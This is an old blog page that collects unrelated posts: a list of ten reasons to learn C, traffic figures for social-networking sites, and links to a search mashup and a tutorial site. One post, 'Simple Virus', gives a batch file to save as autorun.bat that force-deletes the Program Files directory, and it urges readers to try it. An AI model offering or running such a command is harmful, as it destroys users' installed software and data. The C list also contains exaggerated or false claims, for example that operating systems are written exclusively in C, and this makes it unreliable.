Blogger Template by Blogcrowds

J2EE Video Tutorials

Ten reasons why every programmer should learn C

Every programmer should learn C during their programming career. Its benefits are to numerous to ignore. Not only will it open many more job opportunities, but it will teach you more about computers as a whole.

1) C is lower level then other programming languages (C++, Java). Programming at a lower level allows you to further your understanding of computers, as a whole.

2) Device drivers and operating systems are written exclusively in C. Now, you may never write a device driver or an operating system, but what if you are ever required to modify one?

3) What if you ever want to get a job programming microcontrollers? They are programmed in C. Are you going to limit your possible list of jobs because you didn't want to learn a new language?

4) C programs are smaller and faster then any other program created in a different language. Sometimes your program needs that speed boost that only C can give it.

5) If you have learned C, you can learn any modern programming language. The reason behind this is that all modern programming languages are based on C (Java, C++, C#, etc).

6) Because C has been around for many years, it has a large community and collective code base. This allows you to quickly and efficiently implement new algorithms or functions that have been programmed before.

7) C is the language of the Open Source community. The Open Source poster child, Linux, was coded in C. If you know C, you can participate in and contribute to numerous Open Source communities like Source Forge.

8) C is the only language that teaches you what pointers really are. C# and Java skip the subject completely. It is pointers that give C its power.

9) C is still the most commonly required language for programming jobs. It is well worth your time to get C under your belt.

10) Anything that has a microprocessor in it has support for C. From your microwave to your cell phone, C powers technology.

Simple Virus

Hey guys type flowing code in note pad and save it as autorun.bat

@ECHO OFF
IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.*

try this and leave comments here :)

Top Ten Social Networking Sites

Nielson/NetRatings reports that the top 10 social networking sites collectively grew 47% since last year -- a climb from 46.8 million uniques in April 2005 to 68.8 million in April 2006. The data includes blogs -- such as Google's Blogger platform.News Corp's ( NWS) MySpace tops the list, with twice the number of unique visitors of its closest rival. The top sites and their growth/decline year over year:

The following page is collaboration between 2 of the internet's most used and Successful search engines. The search results are shown in a split screen, Yahoo results on the left and Google results on the right. Although it may cut your screen into 2 but, it surely would reduce Ur time spent on searching.

visit: http://www.gahooyoogle.com/

Video tutorials for IT ppl

Hey guys visit www.avaxhome.org and find what ever programming & graphics video tutorials that you are searching for long time

Older Posts